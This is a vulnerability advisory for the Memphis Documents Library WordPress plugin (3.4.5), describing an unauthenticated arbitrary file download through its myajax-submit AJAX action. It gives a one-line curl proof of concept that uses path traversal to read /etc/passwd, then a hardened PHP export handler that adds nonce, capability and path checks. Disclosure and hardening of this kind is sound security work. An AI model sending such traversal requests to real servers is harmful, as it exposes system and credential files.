Memphis Documents Library [Unauthenticated Arbitrary File Download]
Description
The Memphis Documents Library plugin registers the AJAX action myajax-submit,
which provides a convenient way to execute many of the plugin’s
functions. Nearly all of the functions exposed through this hook lack
proper input validation, capability checks, output escaping, etc.
At least one of them can be used to download arbitrary files from the server.
PoC
curl 'http://sbwp2.dev/wp-admin/admin-ajax.php' \
-d 'action=myajax-submit&type=mdocs-export&zip-file=/../etc/passwd'
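For comparison, a hardened export handler that applies the checks the description says are missing (nonce, capability check, path validation). This is an added example, not the plugin's code: the action name, nonce name, capability, export directory and the .zip restriction are assumptions; only the zip-file parameter comes from the PoC.

```php
<?php
// Added example, not the plugin's code. The action name, nonce name, capability
// and export directory are assumptions; 'zip-file' is the PoC's parameter.

/** Map a client-supplied name to a .zip file inside $base_dir, or return null. */
function example_resolve_export_path(string $base_dir, string $requested): ?string
{
    $base = realpath($base_dir);
    if ($base === false) { return null; }
    // Keep only the last path component: "/../etc/passwd" becomes "passwd".
    $name = basename(str_replace('\\', '/', $requested));
    // Assumption: exports are always .zip archives, so nothing else is served.
    if (strtolower(pathinfo($name, PATHINFO_EXTENSION)) !== 'zip') {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

function example_export_handler(): void
{
    check_ajax_referer('example-export', 'nonce');   // dies on a bad nonce
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden');
    }
    $raw = $_POST['zip-file'] ?? '';
    $requested = is_string($raw) ? wp_unslash($raw) : '';
    $uploads = wp_upload_dir();
    $path = example_resolve_export_path($uploads['basedir'] . '/example-exports', $requested);
    if ($path === null) {
        wp_send_json_error('invalid file');
    }
    header('Content-Type: application/zip');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    readfile($path);
    exit;
}

if (function_exists('add_action')) {
    // Authenticated hook only: no wp_ajax_nopriv_ registration.
    add_action('wp_ajax_example-export', 'example_export_handler');
} else {
    // Stand-alone run without WordPress: pass the PoC value to the resolver.
    var_dump(example_resolve_export_path(sys_get_temp_dir(), '/../etc/passwd'));
}
```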
INFO
- 2 June 2016
- Pan Vag
- profiles.wordpress.org
- Memphis Documents Library
- 3.4.5
- WordPress 4.5.2
- DWF-2016-87053